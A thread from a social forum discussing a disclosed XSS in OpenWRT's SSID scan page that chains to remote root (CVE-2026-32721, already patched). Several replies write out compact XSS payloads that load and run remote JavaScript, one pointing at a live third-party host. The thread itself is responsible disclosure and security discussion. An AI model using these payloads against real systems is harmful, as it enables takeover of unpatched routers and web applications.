Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1

Scheduled Pinned Locked Moved Uncategorized
17 Posts 12 Posters 0 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • sash@hachyderm.ioS sash@hachyderm.io

    Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
    Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
    CVE-2026-32721, fixed in 24.10.6 / 25.12.1

    j_r@social.jugendhacker.deJ This user is from outside of this forum
    j_r@social.jugendhacker.deJ This user is from outside of this forum
    j_r@social.jugendhacker.de
    wrote last edited by
    #8

    @sash wow looks like a lot of people are upgrading right now, judging by the ASU server stats 🫣

    1 Reply Last reply
    0
    • R relay@relay.an.exchange shared this topic
    • sash@hachyderm.ioS sash@hachyderm.io

      Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
      Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
      CVE-2026-32721, fixed in 24.10.6 / 25.12.1

      shadowdancer@mstdn.socialS This user is from outside of this forum
      shadowdancer@mstdn.socialS This user is from outside of this forum
      shadowdancer@mstdn.social
      wrote last edited by
      #9

      @sash
      Thanks for the heads up! I frequent the forums but it's been a couple of days since my last visit so I missed this one. It seems the release was announced 17h ago.

      Now, if this was found in a commercial router firmware, how quickly would you guess there'd be a fix available?

      I'd say weeks, or maybe months.

      edit: hashtag for better reach #OpenWRT

      1 Reply Last reply
      0
      • sash@hachyderm.ioS sash@hachyderm.io

        Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
        Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
        CVE-2026-32721, fixed in 24.10.6 / 25.12.1

        nicksilkey@hachyderm.ioN This user is from outside of this forum
        nicksilkey@hachyderm.ioN This user is from outside of this forum
        nicksilkey@hachyderm.io
        wrote last edited by
        #10

        @sash what a find. thanks for sharing, friend. ✌️💙

        1 Reply Last reply
        0
        • sash@hachyderm.ioS sash@hachyderm.io

          Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
          Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
          CVE-2026-32721, fixed in 24.10.6 / 25.12.1

          uvok@woof.techU This user is from outside of this forum
          uvok@woof.techU This user is from outside of this forum
          uvok@woof.tech
          wrote last edited by
          #11

          @sash funny coincidence, I fixed the same class of bug at work recently

          sash@hachyderm.ioS 1 Reply Last reply
          0
          • uvok@woof.techU uvok@woof.tech

            @sash funny coincidence, I fixed the same class of bug at work recently

            sash@hachyderm.ioS This user is from outside of this forum
            sash@hachyderm.ioS This user is from outside of this forum
            sash@hachyderm.io
            wrote last edited by
            #12

            @uvok there's a lot of these, I've been playing with it a lot over the last year, and I have some more fun ones in my queue waiting for release 🙂

            1 Reply Last reply
            0
            • bafdyce@chaos.socialB bafdyce@chaos.social

              @sash TIL that this works:

              <a id=s href=//domain/x.js>
              <img src=x onerror=import(s)>

              This might come in handy in future pentests 🙂

              sash@hachyderm.ioS This user is from outside of this forum
              sash@hachyderm.ioS This user is from outside of this forum
              sash@hachyderm.io
              wrote last edited by
              #13

              @BafDyce Yeah that took me a bit of time to find. An alert(1) fits easy of course, but I have the most fun if I can show a full running exploitation to something practical 🙂

              1 Reply Last reply
              0
              • sash@hachyderm.ioS sash@hachyderm.io

                Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾
                Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
                CVE-2026-32721, fixed in 24.10.6 / 25.12.1

                dgl@infosec.exchangeD This user is from outside of this forum
                dgl@infosec.exchangeD This user is from outside of this forum
                dgl@infosec.exchange
                wrote last edited by
                #14

                @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                dgl@infosec.exchangeD 1 Reply Last reply
                0
                • dgl@infosec.exchangeD dgl@infosec.exchange

                  @sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>

                  (That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)

                  dgl@infosec.exchangeD This user is from outside of this forum
                  dgl@infosec.exchangeD This user is from outside of this forum
                  dgl@infosec.exchange
                  wrote last edited by
                  #15

                  @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                  freddy@social.security.plumbingF 1 Reply Last reply
                  0
                  • dgl@infosec.exchangeD dgl@infosec.exchange

                    @sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.

                    freddy@social.security.plumbingF This user is from outside of this forum
                    freddy@social.security.plumbingF This user is from outside of this forum
                    freddy@social.security.plumbing
                    wrote last edited by
                    #16

                    @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                    dgl@infosec.exchangeD 1 Reply Last reply
                    0
                    • freddy@social.security.plumbingF freddy@social.security.plumbing

                      @dgl @sash `<svg onload>` works in every browser and is shorter :). But maybe you don’t want your PoC to depend on the goodwill of a third party. And not everyone has a short domain.

                      dgl@infosec.exchangeD This user is from outside of this forum
                      dgl@infosec.exchangeD This user is from outside of this forum
                      dgl@infosec.exchange
                      wrote last edited by
                      #17

                      @freddy @sash interesting… https://developer.mozilla.org/en-US/docs/Web/API/SVGElement/load_event claims it doesn’t work in Firefox and references a 15 year old bug… but yes, that would get a few more characters 🙂

                      1 Reply Last reply
                      1
                      0
                      Reply
                      • Reply as topic
                      Log in to reply
                      • Oldest to Newest
                      • Newest to Oldest
                      • Most Votes


                      • Login

                      • Login or register to search.
                      • First post
                        Last post
                      0
                      • Categories
                      • Recent
                      • Tags
                      • Popular
                      • World
                      • Users
                      • Groups